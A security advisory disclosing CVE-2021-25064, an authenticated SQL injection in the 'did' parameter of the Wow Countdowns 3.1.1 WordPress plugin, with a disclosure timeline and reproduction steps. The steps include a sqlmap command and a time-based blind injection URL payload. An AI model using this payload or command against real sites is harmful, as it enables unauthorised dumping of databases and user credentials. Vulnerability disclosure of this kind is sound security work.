CVE-2021-25064 SQL Injection vulnerability in Wow Countdowns 3.1.1 Wordpress Plugin

CVE-2021-25064

CVSS: Pending

https://wordpress.org/plugins/mwp-countdown/

https://wpscan.com/vulnerability/30c70315-3c17-41f0-a12f-7e3f793e259c

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25064

Disclosure Timeline

Dec 10, 2021: Issue Identified and Disclosed to Wpscan (#5662), Got auto reply

Dec 14th, 2021: Got update that vendor had been contacted, CVE Assigned CVE-2021-25064

Dec 15th, 2021: Plugin version updated

Dec 22nd, 2021 : CVE Assigned CVE-2021-25064

January 18, 2022: Plugin closed

March 28, 2022: CVE Published in NVD

Description:

The Wow Countdowns plugin does not sanitize user input into the 'did' parameter and uses it in a SQL statement, leading to an authenticated SQL Injection

We can see the problematic code in \admin\partials\main.php

This vulnerability is present in the current version of the plugin 3.1.1. Administrative access is required to access the vulnerable functionality.

Link to plugin:

https://wordpress.org/plugins/mwp-countdown/

Steps to reproduce:

1. Log into WordPress as the admin user
2. Install Wow Countdowns plugin
3. In the plugin settings create and publish a new countdown.

4. Click the delete link, the capture and save the request in an intercepting proxy.

5. Save the request to a file, request.txt

6. Run sqlmap

sqlmap -r request.txt -dbms=mysql --current-user -p did --batch --flush-session

Or

https://test0.local/wp-admin/admin.php?page=mwp-countdown&info=del&did=1 AND (SELECT 5382 FROM SELECT(SLEEP(5)))PpNt)

Using this technique, we can  dump the entire contents of the database, including WordPress users and so on.